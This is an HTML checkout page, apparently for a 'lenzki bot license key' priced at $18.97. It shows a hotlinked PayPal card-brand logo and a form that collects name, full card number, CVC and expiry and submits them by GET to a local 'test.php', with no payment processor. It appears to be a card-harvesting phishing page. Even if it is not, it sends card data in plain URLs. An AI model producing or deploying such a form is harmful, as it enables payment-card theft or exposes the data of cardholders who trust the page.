

<html>




<style>

{
font-family: 'HelveticaNeue-Light', Helvetica;
  font-weight: 100;
-webkit-font-smoothing: antialiased;
}

body {
	margin: 0;
	padding: 0;
}

.btn {
  font-family: Arial;
  color: #ffffff;
  font-size: 20px;
  background: #00a60b;
  padding: 10px 20px 10px 20px;
  text-decoration: none;
}

.btn:hover {
  background: #058532;
  text-decoration: none;
}



</style>

<center>
<div style="

background-color: #dbdbdb;
width:500px;

">




<font color=#6b6b6b>
<form action="test.php" method="get">


<table width="400" border="0" cellspacing="2" cellpadding="0">
<br>
<tr> <b><h2>Check out methods </h2></b>
<tr> <img width=300px src=https://www.paypalobjects.com/webstatic/mktg/logo/AM_mc_vs_dc_ae.jpg>
<br>

</center>
<br>
 <font face=verdana><u> lenzki bot license key - $18.97 </u> </font>
<br>
<br>

<td width="29%" class="bodytext">Name:</td>
<td width="71%"><input style="HEIGHT:30px;" placeholder=NAME  name="name" type="text" required id="name"</td>
</tr>
<tr>

<td class="bodytext">Credit #</td>
<td><input style="HEIGHT:30px;" placeholder=XXXX-XXXX-XXXX-XXXX  name="cc" type="number" maxlength="16" required id="cc"> </td>
</tr>

<td width="29%" class="bodytext">3DIGIT CVC:</td>
<td width="71%"><input placeholder=123 style="HEIGHT:30px;"  name="cv" maxlength="3" required type="number" id="cv" </td>
</tr>

<td width="29%" class="bodytext">MM/YEAR</td>
<td width="71%"> 

<input style="HEIGHT:30PX; width:40px;" required type=number value=mm maxlength=2 placeholder=MM name=mm>

<input style="height:30px; width:40px;" required type=number value=year maxlength=2 placeholder=YR name=year>


</td>
</tr>



<tr>


<tr>
<td class="bodytext"> </td>
<td align="left" valign="top"><input class=btn type="submit" name="Submit" value="checkout $18.97"></td>
</tr>
</table>

<br>
<br>
<br>
</form> 


</html>
